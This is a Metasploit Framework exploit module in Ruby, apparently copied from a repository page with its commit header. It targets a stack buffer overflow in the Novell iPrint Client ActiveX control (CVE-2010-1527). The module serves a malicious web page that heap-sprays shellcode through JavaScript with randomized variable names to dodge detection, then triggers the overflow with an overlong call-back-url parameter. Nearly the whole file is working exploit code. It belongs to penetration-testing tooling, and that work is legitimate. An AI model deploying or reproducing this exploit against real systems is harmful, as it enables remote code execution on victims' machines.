Michael Schierl
910644400d
All other types of references use String arguments, but approximately half of the EDB references use Fixnums. Fix this by using Strings here too.
155 lines
4.8 KiB
Ruby
155 lines
4.8 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
##
|
|
# novelliprint_callbackurl.rb
|
|
#
|
|
# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework
|
|
#
|
|
# Exploit successfully tested on the following platforms:
|
|
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
|
|
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3
|
|
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2
|
|
#
|
|
# ienipp.ocx version tested:
|
|
# File Version: 5.4.0.0 and 5.4.2.0
|
|
# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C
|
|
# RegKey Safe for Script: True
|
|
# RegKey Safe for Init: True
|
|
# KillBitSet: False
|
|
#
|
|
# References:
|
|
# - CVE-2010-1527
|
|
# - OSVDB 67411
|
|
# - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research
|
|
# - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit
|
|
# - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis
|
|
# - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security
|
|
#
|
|
# Trancer
|
|
# http://www.rec-sec.com
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
|
|
When sending an overly long string to the 'call-back-url' parameter in an
|
|
op-client-interface-version action of ienipp.ocx an attacker may be able to
|
|
execute arbitrary code.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-1527' ],
|
|
[ 'OSVDB', '67411'],
|
|
[ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research
|
|
[ 'EDB', '15042' ], # MOAUB #19
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00",
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
|
|
],
|
|
'DisclosureDate' => 'Aug 20 2010',
|
|
'DefaultTarget' => 0))
|
|
end
|
|
|
|
def autofilter
|
|
false
|
|
end
|
|
|
|
def check_dependencies
|
|
use_zlib
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
# Re-generate the payload.
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
|
|
|
# Encode the shellcode.
|
|
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
|
|
|
# Setup exploit buffers
|
|
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
|
ret = [target.ret].pack('V')
|
|
ret = ret * 250
|
|
blocksize = 0x40000
|
|
fillto = 500
|
|
offset = target['Offset']
|
|
|
|
# ActiveX parameters
|
|
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
|
|
|
|
# Randomize the javascript variable names
|
|
ienipp = rand_text_alpha(rand(100) + 1)
|
|
j_shellcode = rand_text_alpha(rand(100) + 1)
|
|
j_nops = rand_text_alpha(rand(100) + 1)
|
|
j_ret = rand_text_alpha(rand(100) + 1)
|
|
j_headersize = rand_text_alpha(rand(100) + 1)
|
|
j_slackspace = rand_text_alpha(rand(100) + 1)
|
|
j_fillblock = rand_text_alpha(rand(100) + 1)
|
|
j_block = rand_text_alpha(rand(100) + 1)
|
|
j_memory = rand_text_alpha(rand(100) + 1)
|
|
j_counter = rand_text_alpha(rand(30) + 2)
|
|
|
|
html = %Q|<html>
|
|
<script>
|
|
var #{j_shellcode} = unescape('#{shellcode}');
|
|
var #{j_nops} = unescape('#{nops}');
|
|
var #{j_headersize} = 20;
|
|
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
|
|
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
|
|
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
|
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
|
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
|
var #{j_memory} = new Array();
|
|
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
|
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
|
}
|
|
</script>
|
|
<object classid='clsid:#{clsid}' id='#{ienipp}'>
|
|
<param name='operation' value='op-client-interface-version' />
|
|
<param name='result-type' value='url' />
|
|
<param name='call-back-url' value='#{ret}' />
|
|
</object>
|
|
</html>|
|
|
|
|
print_status("Sending #{self.name}")
|
|
|
|
# Transmit the response to the client
|
|
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
|
|
|
# Handle the payload
|
|
handler(cli)
|
|
end
|
|
|
|
end
|